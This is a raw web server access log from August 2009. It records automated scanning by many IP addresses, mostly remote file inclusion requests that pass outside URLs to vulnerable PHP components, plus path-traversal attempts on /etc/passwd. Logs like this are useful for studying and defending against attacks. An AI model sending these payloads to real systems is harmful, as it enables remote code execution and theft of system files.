72.3.139.249 - - [16/Aug/2009:06:04:05 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:04:18 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:04:18 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:04:18 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
211.202.2.220 - - [16/Aug/2009:06:04:25 -0500] "GET /logs/access_log.1236211200%22%20target=%22_blank//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 372 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [16/Aug/2009:06:04:25 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [16/Aug/2009:06:04:25 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.202.2.220 - - [16/Aug/2009:06:04:36 -0500] "GET /logs/access_log.1237075200%22%20target=%22_blank//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 372 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.249 - - [16/Aug/2009:06:05:14 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:05:38 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:05:40 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:05:47 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:06:27 -0500] "GET /logs/access_log.1242259200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:07:01 -0500] "GET /logs//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:07:01 -0500] "GET /logs/access_log.1230595200//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:07:03 -0500] "GET //errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:07:20 -0500] "GET /logs/access_log.1247788800////?_SERVER%5BDOCUMENT_ROOT%5D=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [16/Aug/2009:06:07:20 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://aboutav.com//o/id2.txt????? HTTP/1.1" 200 3247 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
124.158.127.241 - - [16/Aug/2009:06:07:25 -0500] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://aboutav.com//o/id2.txt????? HTTP/1.1" 200 201283 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
165.95.1.130 - - [16/Aug/2009:06:07:26 -0500] "GET /logs/access_log.1229299200//errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:07:35 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:07:35 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:07:35 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:07:52 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:07:52 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:07:52 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:08:26 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:08:26 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:06:08:26 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:08:49 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:08:49 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:08:49 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:09:03 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:09:21 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:09:21 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:06:09:25 -0500] "GET /logs/access_log.1242259200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:09:26 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:09:36 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:09:36 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:06:09:36 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:10:01 -0500] "GET /logs/access_log.1237075200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:10:28 -0500] "GET //include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:10:28 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:10:28 -0500] "GET /logs//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:10:35 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:10:35 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:10:42 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:11:17 -0500] "GET /logs/access_log.1237075200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
209.172.33.230 - - [16/Aug/2009:06:11:37 -0500] "GET /logs//includes/login.php?_SESSION[docroot_path]=http://www.sexywomenalways.com/sexynews/data/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.172.33.230 - - [16/Aug/2009:06:11:37 -0500] "GET //includes/login.php?_SESSION[docroot_path]=http://www.sexywomenalways.com/sexynews/data/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.172.33.230 - - [16/Aug/2009:06:11:37 -0500] "GET /logs/access_log.1236038400//includes/login.php?_SESSION[docroot_path]=http://www.sexywomenalways.com/sexynews/data/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:11:41 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:11:41 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:11:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:11:52 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:11:52 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:11:57 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:12:03 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:12:16 -0500] "GET /logs/access_log.1242950400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:12:46 -0500] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:06:12:46 -0500] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:06:12:46 -0500] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:06:12:46 -0500] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
69.73.159.26 - - [16/Aug/2009:06:13:09 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:06:13:09 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:06:13:09 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:13:23 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:13:26 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:13:29 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.218.5.234 - - [16/Aug/2009:06:13:56 -0500] "GET /logs/access_log.1237075200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:06:14:41 -0500] "GET /logs//includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:06:14:41 -0500] "GET /logs/access_log.1236038400//includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:06:14:41 -0500] "GET //includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:15:24 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:15:24 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:15:24 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:15:40 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:06:15:59 -0500] "GET //includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:06:15:59 -0500] "GET /logs/access_log.1236038400//includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:06:15:59 -0500] "GET /logs//includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:06:17:15 -0500] "GET /logs/index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:06:17:15 -0500] "GET /index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
116.122.158.207 - - [16/Aug/2009:06:17:19 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:19 -0500] "GET /logs/access_log.1243641600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:19 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:06:17:19 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:06:17:19 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:06:17:19 -0500] "GET /logs/access_log.1236211200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:17:20 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:17:20 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:17:20 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.163.145.207 - - [16/Aug/2009:06:17:20 -0500] "GET /logs/access_log.1237075200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:28 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:28 -0500] "GET /logs/access_log.1243641600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:28 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:31 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:31 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:06:17:31 -0500] "GET /logs/access_log.1243641600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:17:41 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:17:55 -0500] "GET /logs/errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:17:55 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:06:17:55 -0500] "GET /errors.php?error=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
204.14.106.24 - - [16/Aug/2009:06:18:14 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 333 "-""Mozilla/5.0"
204.14.106.24 - - [16/Aug/2009:06:18:14 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 338 "-""Mozilla/5.0"
204.14.106.24 - - [16/Aug/2009:06:18:15 -0500] "GET /logs/access_log.1244764800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:18:24 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:18:24 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.225.168.186 - - [16/Aug/2009:06:18:24 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:06:18:26 -0500] "GET /logs/access_log.1243641600/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:06:18:26 -0500] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:06:18:26 -0500] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
